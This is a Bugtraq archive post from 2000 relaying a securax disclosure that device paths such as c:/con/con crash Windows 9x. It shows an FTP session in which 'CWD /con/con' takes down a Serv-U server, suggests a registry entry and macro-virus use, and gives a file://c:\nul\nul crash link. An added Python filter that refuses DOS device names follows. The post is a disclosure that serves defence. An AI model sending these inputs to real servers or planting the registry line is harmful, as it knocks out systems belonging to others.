Bugtraq mailing list archives
con\con is a old thing (anyway is cool)
From: labs () USSRBACK COM (Ussr Labs)
Date: Mon, 6 Mar 2000 14:46:44 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ----------------------------------------------------------------------
New exploit found by the securax crew on 3/3/error

for: windoze 98, maybe 95 too... not for NT4 or win2K

When we looked at the new exploit for IE that uses the image c:/con/con
(http://www.zoomnet.net/~quick/error/crash.html) we experimented a bit with
that nonexistent path. We found that any program in Windows 98 will crash if
you try to open that file.

e.g.: try Start --> Run --> c:/con/con, or open in Word the non-existing
document c:/con/con. Both attempts will result in a Blue Screen of Death and
a lockup.

This can also be exploited to crash remote servers. Look what we tried on
this Serv-U FTP v2.4a (works on any windoze 98 FTP, even with an anonymous or
guest account). It looked something like this:

    230 user logged in, proceed
    SYST
    215 UNIX TYPE:L8
    connect ok!
    PWD
    257 "c:/home" is current directory.
    fetch directory
    TYPE A
    200 Type set to A.
    PORT xx.xx.xx.xx :-)
    200 PORT Command successful
    LIST
    150 Opening ASCII mode data connect
    Download: 86 bytes
    Waiting for the server
    226 transfer complete
    CDUP
    250 directory changed to /c:/
    PWD
    250 "/c:/" is current directory
    CWD /con/con        --> this does the trick
    ... no more response :-) server crashed.

This is probably just the beginning of a new series of exploits for windoze.
This little flaw could easily be used in a macro virus. Maybe it could even
be placed in the registry:

    HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open
    c:\con\con "%1" %*

Da G#Df@RTER & Pathos (securax)
www.securax.org
- ----------------------------------------------------------------------

This is a really old thing (good, but old). We found it about 1 year ago
with nul/nul (now it's con/con), and we found others, but all with the same
error: an overflow in Explorer.exe and VFAT, on Windows 95 and Windows 98.

To anyone who wants to crash Windows 9x, click here: file://c:\nul\nul
u n d e r g r o u n d   s e c u r i t y   s y s t e m s   r e s e a r c h
http://www.ussrback.com

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 6.5.2 for non-commercial use <http://www.pgp.com>

iQA/AwUBOMPvBNybEYfHhkiVEQKedQCfYYyh2G1TOaE5HdtXo0eNc+/K2lgAoIkt
U+6L5I9uSGENV3KFuyKQ8xqu
=vwMM
-----END PGP SIGNATURE-----
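The post shows an FTP server crashing its Windows 9x host when a client sends CWD /con/con, and mentions that nul/nul and "others" behave the same way. The practical mitigation on the server side is to refuse any pathname whose components name an MS-DOS device before the request ever reaches the filesystem. The following is an added example written for this page, not code from the post, from securax, or from any FTP server product; it generalizes beyond the con/nul cases the post shows to the documented Win32 reserved device names (CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9), and the FTP command lines it screens are constructed to resemble the quoted session.

```python
"""
Refuse pathnames whose components name an MS-DOS device (CON, NUL, AUX,
PRN, COM1-9, LPT1-9) before they reach the Windows filesystem.

Added example for this page, not the post's or any FTP server's code.
The device-name list is the documented Win32 reserved set; the post
itself only demonstrates con/con and nul/nul. The FTP command lines at
the bottom are constructed to resemble the quoted session.
"""
import re

# Win32 reserved device names. Windows resolves "CON", "con.txt" and
# "c:\con\con" all to the console device, so the check is case-insensitive
# and ignores any extension after the first dot.
RESERVED_DEVICES = frozenset(
    ["CON", "PRN", "AUX", "NUL"]
    + [f"COM{n}" for n in range(1, 10)]
    + [f"LPT{n}" for n in range(1, 10)]
)

_SEP = re.compile(r"[\\/]+")


def reserved_device_components(path: str) -> list[str]:
    """Return the path components that name a DOS device, in order."""
    hits = []
    for comp in _SEP.split(path):
        if not comp:
            continue
        # Skip a bare drive letter such as "c:" so "c:/con/con" is handled.
        if len(comp) == 2 and comp[1] == ":" and comp[0].isalpha():
            continue
        # Only the text before the first "." is the name Windows looks at;
        # trailing spaces are ignored by the filesystem as well.
        base = comp.split(".", 1)[0].rstrip(" ")
        if base.upper() in RESERVED_DEVICES:
            hits.append(comp)
    return hits


def is_device_path(path: str) -> bool:
    return bool(reserved_device_components(path))


# FTP verbs whose argument is a pathname and therefore needs screening.
_PATH_COMMANDS = {"CWD", "RETR", "STOR", "LIST", "NLST", "DELE", "MKD", "RMD",
                  "RNFR", "RNTO", "SIZE", "MDTM", "APPE", "STAT"}


def screen_ftp_command(line: str) -> tuple[bool, str]:
    """
    Decide whether one FTP command line may be handed to the filesystem.
    Returns (allowed, reply) where reply is the FTP response to send back.
    """
    line = line.rstrip("\r\n")
    verb, _, arg = line.partition(" ")
    verb = verb.upper()
    if verb in _PATH_COMMANDS and arg and is_device_path(arg):
        bad = ", ".join(reserved_device_components(arg))
        return False, f"550 Path refers to a device name ({bad}); refused."
    return True, "200 OK"


if __name__ == "__main__":
    # Constructed command lines modelled on the session quoted in the post.
    for cmd in ["PWD", "CWD /home", "CWD /con/con", "RETR c:\\nul\\nul",
                "STOR aux.txt", "LIST /tmp/console"]:
        allowed, reply = screen_ftp_command(cmd)
        print(f"{cmd:<22} -> {'pass' if allowed else 'REFUSE'}  {reply}")
```

The check deliberately works on the raw textual components rather than on the result of os.path normalisation, because the point is to stop the string before any Windows path API interprets it; "console" passes (its base name is not a device), while "aux.txt" is refused, since Windows would open the AUX device regardless of the extension.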
Current thread:
- con\con is a old thing (anyway is cool) Ussr Labs (Mar 06)
- Re: con\con is a old thing (anyway is cool) Stephen White (Mar 08)
- Realplayer update pedward () WEBCOM COM (Mar 09)
- Re: con\con is a old thing (anyway is cool) Elias Levy (Mar 11)
- Re: con\con is a old thing (anyway is cool) YUFU (Mar 11)
- <Possible follow-ups>
- Re: con\con is a old thing (anyway is cool) Oliver Friedrichs (Mar 15)
- Re: con\con is a old thing (anyway is cool) Bernd Luevelsmeyer (Mar 17)
- Re: con\con is a old thing (anyway is cool) David LeBlanc (Mar 17)
- Verified PIX vulnerability to FTP-Pasv attack. monti (Mar 19)